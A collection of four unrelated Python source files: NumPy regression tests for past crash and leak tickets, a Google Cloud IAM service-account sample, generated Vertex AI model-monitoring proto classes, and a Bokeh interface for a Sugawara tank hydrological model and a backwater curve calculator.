for i in range(1000):
# 100MB times 1000 would give 100GB of memory usage if it leaks
a = np.empty((100000000,), dtype='i1')
del a
def test_ufunc_reduce_memoryleak(self):
a = np.arange(6)
acnt = sys.getrefcount(a)
np.add.reduce(a)
assert_equal(sys.getrefcount(a), acnt)
def test_search_sorted_invalid_arguments(self):
# Ticket #2021, should not segfault.
x = np.arange(0, 4, dtype='datetime64[D]')
assert_raises(TypeError, x.searchsorted, 1)
def test_string_truncation(self):
# Ticket #1990 - Data can be truncated in creation of an array from a
# mixed sequence of numeric values and strings
for val in [True, 1234, 123.4, complex(1, 234)]:
for tostr in [asunicode, asbytes]:
b = np.array([val, tostr('xx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xx'), val])
assert_equal(tostr(b[1]), tostr(val))
# test also with longer strings
b = np.array([val, tostr('xxxxxxxxxx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xxxxxxxxxx'), val])
assert_equal(tostr(b[1]), tostr(val))
def test_string_truncation_ucs2(self):
# Ticket #2081. Python compiled with two byte unicode
# can lead to truncation if itemsize is not properly
# adjusted for Numpy's four byte unicode.
if sys.version_info[0] >= 3:
a = np.array(['abcd'])
else:
a = np.array([sixu('abcd')])
assert_equal(a.dtype.itemsize, 16)
def test_unique_stable(self):
# Ticket #2063 must always choose stable sort for argsort to
# get consistent results
v = np.array(([0]*5 + [1]*6 + [2]*6)*4)
res = np.unique(v, return_index=True)
tgt = (np.array([0, 1, 2]), np.array([ 0, 5, 11]))
assert_equal(res, tgt)
def test_unicode_alloc_dealloc_match(self):
# Ticket #1578, the mismatch only showed up when running
# python-debug for python versions >= 2.7, and then as
# a core dump and error message.
a = np.array(['abc'], dtype=np.unicode)[0]
del a
def test_refcount_error_in_clip(self):
# Ticket #1588
a = np.zeros((2,), dtype='>i2').clip(min=0)
x = a + a
# This used to segfault:
y = str(x)
# Check the final string:
assert_(y == "[0 0]")
def test_searchsorted_wrong_dtype(self):
# Ticket #2189, it used to segfault, so we check that it raises the
# proper exception.
a = np.array([('a', 1)], dtype='S1, int')
assert_raises(TypeError, np.searchsorted, a, 1.2)
# Ticket #2066, similar problem:
dtype = np.format_parser(['i4', 'i4'], [], [])
a = np.recarray((2, ), dtype)
assert_raises(TypeError, np.searchsorted, a, 1)
def test_complex64_alignment(self):
# Issue gh-2668 (trac 2076), segfault on sparc due to misalignment
dtt = np.complex64
arr = np.arange(10, dtype=dtt)
# 2D array
arr2 = np.reshape(arr, (2, 5))
# Fortran write followed by (C or F) read caused bus error
data_str = arr2.tobytes('F')
data_back = np.ndarray(arr2.shape,
arr2.dtype,
buffer=data_str,
order='F')
assert_array_equal(arr2, data_back)
def test_structured_count_nonzero(self):
arr = np.array([0, 1]).astype('i4, (2)i4')[:1]
count = np.count_nonzero(arr)
assert_equal(count, 0)
def test_copymodule_preserves_f_contiguity(self):
a = np.empty((2, 2), order='F')
b = copy.copy(a)
c = copy.deepcopy(a)
assert_(b.flags.fortran)
assert_(b.flags.f_contiguous)
assert_(c.flags.fortran)
assert_(c.flags.f_contiguous)
def test_fortran_order_buffer(self):
import numpy as np
a = np.array([['Hello', 'Foob']], dtype='U5', order='F')
arr = np.ndarray(shape=[1, 2, 5], dtype='U1', buffer=a)
arr2 = np.array([[[sixu('H'), sixu('e'), sixu('l'), sixu('l'), sixu('o')],
[sixu('F'), sixu('o'), sixu('o'), sixu('b'), sixu('')]]])
assert_array_equal(arr, arr2)
def test_assign_from_sequence_error(self):
# Ticket #4024.
arr = np.array([1, 2, 3])
assert_raises(ValueError, arr.__setitem__, slice(None), [9, 9])
arr.__setitem__(slice(None), [9])
assert_equal(arr, [9, 9, 9])
def test_format_on_flex_array_element(self):
# Ticket #4369.
dt = np.dtype([('date', '<M8[D]'), ('val', '<f8')])
arr = np.array([('2000-01-01', 1)], dt)
formatted = '{0}'.format(arr[0])
assert_equal(formatted, str(arr[0]))
def test_deepcopy_on_0d_array(self):
# Ticket #3311.
arr = np.array(3)
arr_cp = copy.deepcopy(arr)
assert_equal(arr, arr_cp)
assert_equal(arr.shape, arr_cp.shape)
assert_equal(int(arr), int(arr_cp))
self.assertTrue(arr is not arr_cp)
self.assertTrue(isinstance(arr_cp, type(arr)))
def test_bool_subscript_crash(self):
# gh-4494
c = np.rec.array([(1, 2, 3), (4, 5, 6)])
masked = c[np.array([True, False])]
base = masked.base
del masked, c
base.dtype
def test_richcompare_crash(self):
# gh-4613
import operator as op
# dummy class where __array__ throws exception
class Foo(object):
__array_priority__ = 1002
def __array__(self,*args,**kwargs):
raise Exception()
rhs = Foo()
lhs = np.array(1)
for f in [op.lt, op.le, op.gt, op.ge]:
if sys.version_info[0] >= 3:
assert_raises(TypeError, f, lhs, rhs)
else:
f(lhs, rhs)
assert_(not op.eq(lhs, rhs))
assert_(op.ne(lhs, rhs))
def test_richcompare_scalar_and_subclass(self):
# gh-4709
class Foo(np.ndarray):
def __eq__(self, other):
return "OK"
x = np.array([1,2,3]).view(Foo)
assert_equal(10 == x, "OK")
assert_equal(np.int32(10) == x, "OK")
assert_equal(np.array([10]) == x, "OK")
def test_pickle_empty_string(self):
# gh-3926
import pickle
test_string = np.string_('')
assert_equal(pickle.loads(pickle.dumps(test_string)), test_string)
def test_frompyfunc_many_args(self):
# gh-5672
def passer(*args):
pass
assert_raises(ValueError, np.frompyfunc, passer, 32, 1)
def test_repeat_broadcasting(self):
# gh-5743
a = np.arange(60).reshape(3, 4, 5)
for axis in chain(range(-a.ndim, a.ndim), [None]):
assert_equal(a.repeat(2, axis=axis), a.repeat([2], axis=axis))
def test_frompyfunc_nout_0(self):
# gh-2014
def f(x):
x[0], x[-1] = x[-1], x[0]
uf = np.frompyfunc(f, 1, 0)
a = np.array([[1, 2, 3], [4, 5], [6, 7, 8, 9]])
assert_equal(uf(a), ())
assert_array_equal(a, [[3, 2, 1], [5, 4], [9, 7, 8, 6]])
def test_leak_in_structured_dtype_comparison(self):
# gh-6250
recordtype = np.dtype([('a', np.float64),
('b', np.int32),
('d', (np.str, 5))])
# Simple case
a = np.zeros(2, dtype=recordtype)
for i in range(100):
a == a
assert_(sys.getrefcount(a) < 10)
# The case in the bug report.
before = sys.getrefcount(a)
u, v = a[0], a[1]
u == v
del u, v
gc.collect()
after = sys.getrefcount(a)
assert_equal(before, after)
def test_empty_percentile(self):
# gh-6530 / gh-6553
assert_array_equal(np.percentile(np.arange(10), []), np.array([]))
def test_void_compare_segfault(self):
# gh-6922. The following should not segfault
a = np.ones(3, dtype=[('object', 'O'), ('int', '<i2')])
a.sort()
if __name__ == "__main__":
run_module_suite()
|
#!/usr/bin/env python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Demonstrates how to perform basic operations with Google Cloud IAM
service accounts.
For more information, see the documentation at
https://cloud.google.com/iam/docs/creating-managing-service-accounts.
"""
import argparse
import os
from google.oauth2 import service_account
import googleapiclient.discovery
credentials = service_account.Credentials.from_service_account_file(
filename=os.environ['GOOGLE_APPLICATION_CREDENTIALS'],
scopes=['https://www.googleapis.com/auth/cloud-platform'])
service = googleapiclient.discovery.build(
'iam', 'v1', credentials=credentials)
# [START iam_create_service_account]
def create_service_account(project_id, name, display_name):
"""Creates a service account."""
# pylint: disable=no-member
service_account = service.projects().serviceAccounts().create(
name='projects/' + project_id,
body={
'accountId': name,
'serviceAccount': {
'displayName': display_name
}
}).execute()
print('Created service account: ' + service_account['email'])
return service_account
# [END iam_create_service_account]
# [START iam_list_service_accounts]
def list_service_accounts(project_id):
"""Lists all service accounts for the current project."""
# pylint: disable=no-member
service_accounts = service.projects().serviceAccounts().list(
name='projects/' + project_id).execute()
for account in service_accounts['accounts']:
print('Name: ' + account['name'])
print('Email: ' + account['email'])
print(' ')
return service_accounts
# [END iam_list_service_accounts]
# [START iam_rename_service_account]
def rename_service_account(email, new_display_name):
"""Changes a service account's display name."""
# First, get a service account using List() or Get()
resource = 'projects/-/serviceAccounts/' + email
# pylint: disable=no-member
service_account = service.projects().serviceAccounts().get(
name=resource).execute()
# Then you can update the display name
service_account['displayName'] = new_display_name
service_account = service.projects().serviceAccounts().update(
name=resource, body=service_account).execute()
print('Updated display name for {} to: {}'.format(
service_account['email'], service_account['displayName']))
return service_account
# [END iam_rename_service_account]
# [START iam_delete_service_account]
def delete_service_account(email):
"""Deletes a service account."""
# pylint: disable=no-member
service.projects().serviceAccounts().delete(
name='projects/-/serviceAccounts/' + email).execute()
print('Deleted service account: ' + email)
# [END iam_delete_service_account]
def main():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
subparsers = parser.add_subparsers(dest='command')
# Create
create_parser = subparsers.add_parser(
'create', help=create_service_account.__doc__)
create_parser.add_argument('project_id')
create_parser.add_argument('name')
create_parser.add_argument('display_name')
# List
list_parser = subparsers.add_parser(
'list', help=list_service_accounts.__doc__)
list_parser.add_argument('project_id')
# Rename
rename_parser = subparsers.add_parser(
'delete', help=rename_service_account.__doc__)
rename_parser.add_argument('email')
rename_parser.add_argument('new_display_name')
# Delete
delete_parser = subparsers.add_parser(
'delete', help=delete_service_account.__doc__)
delete_parser.add_argument('email')
args = parser.parse_args()
if args.command == 'create':
create_service_account(args.project_id, args.name, args.display_name)
elif args.command == 'list':
list_service_accounts(args.project_id)
elif args.command == 'rename':
rename_service_account(args.email, args.new_display_name)
elif args.command == 'delete':
delete_service_account(args.email)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.aiplatform_v1.types import io
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1",
manifest={
"ModelMonitoringObjectiveConfig",
"ModelMonitoringAlertConfig",
"ThresholdConfig",
"SamplingStrategy",
},
)
class ModelMonitoringObjectiveConfig(proto.Message):
r"""Next ID: 7
Attributes:
training_dataset (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingDataset):
Training dataset for models. This field has
to be set only if
TrainingPredictionSkewDetectionConfig is
specified.
training_prediction_skew_detection_config (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingPredictionSkewDetectionConfig):
The config for skew between training data and
prediction data.
prediction_drift_detection_config (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.PredictionDriftDetectionConfig):
The config for drift of prediction data.
explanation_config (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.ExplanationConfig):
The config for integrating with Vertex
Explainable AI.
"""
class TrainingDataset(proto.Message):
r"""Training Dataset information.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
dataset (str):
The resource name of the Dataset used to
train this Model.
This field is a member of `oneof`_ ``data_source``.
gcs_source (google.cloud.aiplatform_v1.types.GcsSource):
The Google Cloud Storage uri of the unmanaged
Dataset used to train this Model.
This field is a member of `oneof`_ ``data_source``.
bigquery_source (google.cloud.aiplatform_v1.types.BigQuerySource):
The BigQuery table of the unmanaged Dataset
used to train this Model.
This field is a member of `oneof`_ ``data_source``.
data_format (str):
Data format of the dataset, only applicable
if the input is from Google Cloud Storage.
The possible formats are:
"tf-record"
The source file is a TFRecord file.
"csv"
The source file is a CSV file.
target_field (str):
The target field name the model is to
predict. This field will be excluded when doing
Predict and (or) Explain for the training data.
logging_sampling_strategy (google.cloud.aiplatform_v1.types.SamplingStrategy):
Strategy to sample data from Training
Dataset. If not set, we process the whole
dataset.
"""
dataset = proto.Field(proto.STRING, number=3, oneof="data_source",)
gcs_source = proto.Field(
proto.MESSAGE, number=4, oneof="data_source", message=io.GcsSource,
)
bigquery_source = proto.Field(
proto.MESSAGE, number=5, oneof="data_source", message=io.BigQuerySource,
)
data_format = proto.Field(proto.STRING, number=2,)
target_field = proto.Field(proto.STRING, number=6,)
logging_sampling_strategy = proto.Field(
proto.MESSAGE, number=7, message="SamplingStrategy",
)
class TrainingPredictionSkewDetectionConfig(proto.Message):
r"""The config for Training & Prediction data skew detection. It
specifies the training dataset sources and the skew detection
parameters.
Attributes:
skew_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingPredictionSkewDetectionConfig.SkewThresholdsEntry]):
Key is the feature name and value is the
threshold. If a feature needs to be monitored
for skew, a value threshold must be configured
for that feature. The threshold here is against
feature distribution distance between the
training and prediction feature.
attribution_score_skew_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingPredictionSkewDetectionConfig.AttributionScoreSkewThresholdsEntry]):
Key is the feature name and value is the
threshold. The threshold here is against
attribution score distance between the training
and prediction feature.
"""
skew_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=1, message="ThresholdConfig",
)
attribution_score_skew_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=2, message="ThresholdConfig",
)
class PredictionDriftDetectionConfig(proto.Message):
r"""The config for Prediction data drift detection.
Attributes:
drift_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.PredictionDriftDetectionConfig.DriftThresholdsEntry]):
Key is the feature name and value is the
threshold. If a feature needs to be monitored
for drift, a value threshold must be configured
for that feature. The threshold here is against
feature distribution distance between different
time windws.
attribution_score_drift_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.PredictionDriftDetectionConfig.AttributionScoreDriftThresholdsEntry]):
Key is the feature name and value is the
threshold. The threshold here is against
attribution score distance between different
time windows.
"""
drift_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=1, message="ThresholdConfig",
)
attribution_score_drift_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=2, message="ThresholdConfig",
)
class ExplanationConfig(proto.Message):
r"""The config for integrating with Vertex Explainable AI. Only
applicable if the Model has explanation_spec populated.
Attributes:
enable_feature_attributes (bool):
If want to analyze the Vertex Explainable AI
feature attribute scores or not. If set to true,
Vertex AI will log the feature attributions from
explain response and do the skew/drift detection
for them.
explanation_baseline (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline):
Predictions generated by the
BatchPredictionJob using baseline dataset.
"""
class ExplanationBaseline(proto.Message):
r"""Output from
[BatchPredictionJob][google.cloud.aiplatform.v1.BatchPredictionJob]
for Model Monitoring baseline dataset, which can be used to generate
baseline attribution scores.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
gcs (google.cloud.aiplatform_v1.types.GcsDestination):
Cloud Storage location for BatchExplain
output.
This field is a member of `oneof`_ ``destination``.
bigquery (google.cloud.aiplatform_v1.types.BigQueryDestination):
BigQuery location for BatchExplain output.
This field is a member of `oneof`_ ``destination``.
prediction_format (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline.PredictionFormat):
The storage format of the predictions
generated BatchPrediction job.
"""
class PredictionFormat(proto.Enum):
r"""The storage format of the predictions generated
BatchPrediction job.
"""
PREDICTION_FORMAT_UNSPECIFIED = 0
JSONL = 2
BIGQUERY = 3
gcs = proto.Field(
proto.MESSAGE, number=2, oneof="destination", message=io.GcsDestination,
)
bigquery = proto.Field(
proto.MESSAGE,
number=3,
oneof="destination",
message=io.BigQueryDestination,
)
prediction_format = proto.Field(
proto.ENUM,
number=1,
enum="ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline.PredictionFormat",
)
enable_feature_attributes = proto.Field(proto.BOOL, number=1,)
explanation_baseline = proto.Field(
proto.MESSAGE,
number=2,
message="ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline",
)
training_dataset = proto.Field(proto.MESSAGE, number=1, message=TrainingDataset,)
training_prediction_skew_detection_config = proto.Field(
proto.MESSAGE, number=2, message=TrainingPredictionSkewDetectionConfig,
)
prediction_drift_detection_config = proto.Field(
proto.MESSAGE, number=3, message=PredictionDriftDetectionConfig,
)
explanation_config = proto.Field(
proto.MESSAGE, number=5, message=ExplanationConfig,
)
class ModelMonitoringAlertConfig(proto.Message):
r"""Next ID: 3
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
email_alert_config (google.cloud.aiplatform_v1.types.ModelMonitoringAlertConfig.EmailAlertConfig):
Email alert config.
This field is a member of `oneof`_ ``alert``.
enable_logging (bool):
Dump the anomalies to Cloud Logging. The anomalies will be
put to json payload encoded from proto
[google.cloud.aiplatform.logging.ModelMonitoringAnomaliesLogEntry][].
This can be further sinked to Pub/Sub or any other services
supported by Cloud Logging.
"""
class EmailAlertConfig(proto.Message):
r"""The config for email alert.
Attributes:
user_emails (Sequence[str]):
The email addresses to send the alert.
"""
user_emails = proto.RepeatedField(proto.STRING, number=1,)
email_alert_config = proto.Field(
proto.MESSAGE, number=1, oneof="alert", message=EmailAlertConfig,
)
enable_logging = proto.Field(proto.BOOL, number=2,)
class ThresholdConfig(proto.Message):
r"""The config for feature monitoring threshold.
Next ID: 3
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
value (float):
Specify a threshold value that can trigger
the alert. If this threshold config is for
feature distribution distance: 1. For
categorical feature, the distribution distance
is calculated by L-inifinity norm.
2. For numerical feature, the distribution
distance is calculated by Jensen–Shannon
divergence.
Each feature must have a non-zero threshold if
they need to be monitored. Otherwise no alert
will be triggered for that feature.
This field is a member of `oneof`_ ``threshold``.
"""
value = proto.Field(proto.DOUBLE, number=1, oneof="threshold",)
class SamplingStrategy(proto.Message):
r"""Sampling Strategy for logging, can be for both training and
prediction dataset.
Next ID: 2
Attributes:
random_sample_config (google.cloud.aiplatform_v1.types.SamplingStrategy.RandomSampleConfig):
Random sample config. Will support more
sampling strategies later.
"""
class RandomSampleConfig(proto.Message):
r"""Requests are randomly selected.
Attributes:
sample_rate (float):
Sample rate (0, 1]
"""
sample_rate = proto.Field(proto.DOUBLE, number=1,)
random_sample_config = proto.Field(
proto.MESSAGE, number=1, message=RandomSampleConfig,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
"""
main page
"""
#import os
#os.chdir("C:/Users/Mostafa/Desktop/My Files/thesis/My Thesis/Data_and_Models/Interface/Distributed_Hydrological_model")
import sys
sys.path.append("HBV_distributed/function")
#%% Library
import numpy as np
import pandas as pd
import time
import datetime as dt
#import gdal
from math import pi
from bokeh.layouts import widgetbox, gridplot, column
from bokeh.models.widgets import Slider, Button, RadioGroup, TextInput, Div, Tabs
from bokeh.models.widgets import DataTable, DateFormatter, TableColumn, Panel
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.io import curdoc, show
from bokeh.models import LinearAxis, Range1d
# functions
import DHBV_functions
import sugawara as sug
import fsf_model
import bwc_collis as BW
#%% Read the output.asc file
skip_rows = 16 # Number of rows to skip in the output file
data_file = 'myapp/static/data/output.asc' # Name of the output file
data_file1= 'HBV_distributed/static/input_data/' # Name of the output file
#
s=dt.datetime(2012,06,14,19,00,00)
e=dt.datetime(2013,12,23,00,00,00)
#
#index=pd.date_range(s,e,freq="1H")
#lake_data=pd.DataFrame(index=index)
#lake_data['et']=np.loadtxt(data_file1+"lake/" + "et.txt")
#lake_data['tm']=np.loadtxt(data_file1+"lake/" + "avgtemp.txt")
#lake_data['plake']=np.loadtxt(data_file1+"lake/" + "plake.txt")
#lake_data['Q']=np.loadtxt(data_file1+"lake/" + "Q.txt")
#lake_data['t']=np.loadtxt(data_file1+"lake/" + "temp.txt")
#lakecell=[2,1] # 4km
#lakecell=[4,2] # 2km
#lakecell=[10,4] # 1km
#lakecell=[19,10] # 500m
#sp_prec_c=np.load(data_file1 +'sp_prec_c.npy')
#sp_et_c=np.load(data_file1 +'sp_et_c.npy')
#sp_temp_c=np.load(data_file1 +'sp_temp_c.npy')
#
#flow_acc_table=DHBV_functions.load_obj(data_file1 +"flow_acc_table")
#flow_acc=np.load(data_file1 +'flow_acc.npy')
#DEM = gdal.Open(data_file+"/DEM/"+"dem_4km.tif")
#elev, no_val=DHBV_functions.get_raster_data(DEM)
#
#elev[elev==no_val]=np.nan
#no_cells=np.size(elev[:,:])-np.count_nonzero(np.isnan(elev[:,:]))
# Read data from the output file
data = pd.read_csv(data_file,
skiprows=skip_rows,
skipinitialspace=True,
index_col='Time')
# Create vector with time stamps
time_index = pd.date_range('1994 12 07 20:00', periods=len(data), freq='H')
data.set_index(time_index, inplace=True)
# Intial Parameters
pars = [0.5, 0.2, 0.01, 0.1, 10.0, 20.0, 1, 1]
extra_pars = [1, 147.0] # time factor and area (extra parameters)
# Define the precipitation data to give to the model
prec = np.array(data['Rainfall']) + np.array(data['Snowfall'])
evap = np.array(data['ActualET'])
q_rec = np.array(data['Qrec'])
snow = np.array(data['Snowfall'])
#%% Setup model (function)
q_sim = []
#set up data source
# all input data
ds_rec = ColumnDataSource(dict(q_rec = q_rec,
ds_time = time_index,
evap = evap,
prec = prec,
snow = snow))
# calculated discharge
ds_sim = ColumnDataSource(dict( q_sim = q_sim , ds_time = time_index))
# Create Data Table
columns_sug = [
TableColumn(field='ds_time', title="Date",
formatter=DateFormatter(format = 'ddMyy')),
TableColumn(field="prec", title="Precipitation"),
TableColumn(field="snow", title="Snowfall"),
TableColumn(field="evap", title="Actual ET"),
TableColumn(field="q_rec", title="Recorded Discharge"),]
data_table = DataTable(source=ds_rec,
columns=columns_sug,
width=2*630,height=340)
#%% plotting in sugawara tab
#widget dimensions for plotting
width = 620 # width of the input data graph in sugawara model tab
width2 = 640 # width of the sim vs rec hydrograph in sugawara model tab
height = 430
maxq_rec = np.max(np.array(q_rec)) # maximum discharge from recorded values
maxp = np.max(prec) # maximum precipitation from data
# Precipitation and Recorded Discharge plot
# setup plot
plot_sim = figure(width=width,
height=height,
title="Precipitation and Recorded Discharge",
y_range = (0, 1.75*maxq_rec),
x_axis_type = "datetime",
toolbar_location = "above",)
plot_sim.extra_y_ranges = {"eff_rain": Range1d(start=3.0*maxp, end=0)}
# plot precip
plot_sim.line(x = 'ds_time',
y = 'q_rec',
source = ds_rec,
color="navy",
legend='recorded discharge')
# plot q recorded
plot_sim.line(x = 'ds_time',
y = 'prec',
source = ds_rec,
color="grey",
y_range_name="eff_rain",
legend='precipitation')
plot_sim.yaxis.axis_label = "Discharge [m3/s]"
plot_sim.xaxis.axis_label = "Dates"
plot_sim.xaxis.major_label_orientation = pi/4
plot_sim.add_layout(LinearAxis(y_range_name="eff_rain" ,
axis_label = "Rainfall [mm]" ), 'right')
#______________________________________________________________________________
#______________________________________________________________________________
# rec vs simulated hydrograph
plot_qsim = figure(width=width2,
height=height,
title="Recorded vs Simulated Discharge",
toolbar_location = "above",
x_axis_type = "datetime")
plot_qsim.line(x = 'ds_time',
y = 'q_sim',
source = ds_sim,
color="firebrick",
legend='simulated discharge')
plot_qsim.line(x = 'ds_time',
y = 'q_rec',
source = ds_rec,
color="navy",
legend='recorded discharge')
plot_qsim.yaxis.axis_label = "Discharge [m3/s]"
plot_qsim.xaxis.axis_label = "Dates"
plot_qsim.xaxis.major_label_orientation = pi/4
#______________________________________________________________________________
#______________________________________________________________________________
# plot ET
plot_evap = figure( width=width,
height=height,
title="Evapotranspiration",
x_axis_type = "datetime",
toolbar_location = "above",)
plot_evap.line(x = 'ds_time',
y = 'evap',
source = ds_rec,
color="firebrick",
legend='Actual ET')
plot_evap.yaxis.axis_label = "ET [mm/t]"
plot_evap.xaxis.axis_label = "Dates"
plot_evap.xaxis.major_label_orientation = pi/4
#%% make the widgets
# text input
w_k1 = TextInput(value = '0.5', title = 'Upper tank upper Q coefficient')
w_k2 = TextInput(value = '0.2', title = 'Upper tank lower Q coefficient')
w_k3 = TextInput(value = '0.01', title = 'Percolation to lower tank coefficient')
w_k4 = TextInput(value = '0.1', title = 'Lower tank Q coefficient')
w_d1 = TextInput(value = '10.0', title = 'Upper tank upper Q position')
w_d2 = TextInput(value = '20.0', title = 'Upper tank lower Q position')
w_s1 = TextInput(value = '1.0', title = 'Level of the top tank [mm]')
w_s2 = TextInput(value = '1.0', title = 'Level of the bottom tank [mm]')
w_dt = TextInput(value = '1.0', title = 'Number of hours in the time step [s]')
w_area = TextInput(value = '147.0', title = 'Catchment area [km2]')
# buttons
w_button = Button(label = 'Run model', button_type = 'success' , width = 150)
calibrate_button = Button(label = 'Calibrate model', button_type = 'warning', width = 150)
# message
nse = Div(text=" ")
#%% define the update
def run_sugawara_model():
nse.text = str("<h2>processing...<h2>")
# read values of parameters
_k1 = float(w_k1.value)
_k2 = float(w_k2.value)
_k3 = float(w_k3.value)
_k4 = float(w_k4.value)
_d1 = float(w_d1.value)
_d2 = float(w_d2.value)
_s1 = float(w_s1.value)
_s2 = float(w_s2.value)
_dt = float(w_dt.value)
_area = float(w_area.value)
pars = [_k1, _k2, _k3, _k4, _d1, _d2, _s1, _s2]
extra_pars = [_dt, _area]
#run the model with the value of the interface
q_sim, st_sim = sug.simulate(prec, evap, pars, extra_pars) # Run the model
#update data source
ds_sim.data = (dict(q_sim = q_sim , ds_time = time_index))
# Calculate model performance
model_perf(q_sim, q_rec)
def model_perf(q_sim, q_rec):
q_sim.pop() # remove last element before NSE
nse.text = str("<h2>calculating model performance..<h2>")
perf = sug.NSE(q_sim, q_rec)
nse.text = str("<h2>Model perfomance(NSE) is %s<h2>" %round(perf, 3))
def calibrate_sugawara_model():
nse.text = str("<h2>calibrating...<h2>")
x, fun = sug.calibrate(prec, evap, extra_pars, q_rec)
# update text
w_k1.value = str(x[0])
w_k2.value = str(x[1])
w_k3.value = str(x[2])
w_k4.value = str(x[3])
w_d1.value = str(x[4])
w_d2.value = str(x[5])
w_s1.value = str(x[6])
w_s2.value = str(x[7])
# update NSE
nse.text = str("<h2>model calibrated, parameters updated, rerun model.<h2>")
#%% assign buttons
w_button.on_click(run_sugawara_model)
calibrate_button.on_click(calibrate_sugawara_model)
div = Div(text="<h1 style=color:blue;>Sugawara Tank Model<h1>",
width = 590, height=height)
par_label = Div(text=" <h3> Sugawara Model\n <h3>")
par_label2 = Div(text="<h3> Input Parameters\n <h3>")
model_label = Div(text="<h3>Model configuration and results<h3>")
file_label = Div(text="<h3>Input Data from file<h3>")
#%% show the GUI
# widget boxes
wb1 = widgetbox(par_label,w_k1,w_k2,w_k3,w_k4,w_d1,w_button,
nse, height = height)
wb2 = widgetbox(par_label2,w_d2,w_s1,w_s2,w_dt,
w_area,calibrate_button, height = height)
#%% make a grid
grid = gridplot ( [[model_label ],
[wb1, wb2, plot_qsim] ,
[file_label ],
[plot_sim, plot_evap],
#[tbl_label ],
#[data_table ]
] )
tab2 = Panel(child=grid, title="SUGAWARA MODEL")
''' ============================================================================================================================================================
# ============================================================================================================================================================
# ============================================================================================================================================================
# ============================================================================================================================================================'''
#%% Back water curve
# Setup model (function)
Model = BW.calcFixed
# Setup data
hn = 6.0
dx = 100.0
Q = 500
C = 50.0
b = 100.0
I = 0.001
Nx = 50
#==============================================================================
# pfile_name = 'myapp/static/data/input.txt'
# bw_pars = BW.readValues(pfile_name)
#
# # assign each value to the key
# for k,v in bw_pars.items():
# exec("%s=%r" % (k,v))
#
#==============================================================================
depth, hg, waterlevel, distance = Model(hn,dx,Q,C,b,I,Nx)
#set up data source
ds_bw = ColumnDataSource(dict(dist = distance,wl=waterlevel,z0 = hg,h = depth))
columns_bw = [TableColumn(field="dist", title="distance"),
TableColumn(field="z0", title="bed level"),
TableColumn(field="wl", title="water level"),
TableColumn(field="h", title="water depth")
]
data_table_bw = DataTable(source=ds_bw, columns=columns_bw,
width=1200, height=580)
#set up plot
p = figure(plot_width=width+300, plot_height=height+50,
title = 'Back Water Curve' , x_range=(0, distance[-1]))
p.line(x = 'dist', y = 'wl', source = ds_bw,
alpha=0.5, color="navy", legend="Water level", line_width = 3)
p.line(x = 'dist', y = 'z0', source = ds_bw,
alpha=0.5, color="black", legend="Bed level" , line_width = 3)
p.yaxis.axis_label = "Height (m)"
p.xaxis.axis_label = "Distance (m)"
p.legend.location = 'top_right'
p.legend.label_text_font_style = "italic"
p.xgrid.grid_line_color = None
p.ygrid.grid_line_color = None
p.xaxis.major_label_orientation = pi/4
#make the widgets
w_hn = TextInput(value = str(hn) , title = 'Initial depth h0')
w_dx = TextInput(value = str(dx), title = 'delta x dx')
w_C = TextInput(value = str(C), title = 'chezy coefficient C')
w_b = TextInput(value = str(b), title = 'channel width b')
w_I = TextInput(value = str(I), title = ' channel slope I')
w_Nx = TextInput(value = str(Nx), title = 'Number of iterations Nx')
w_Q = Slider(start=1, end=2000, value=Q, step=.1, title="Discharge")
w_button_bw = Button(label = 'Run model', button_type = 'success', width = 150)
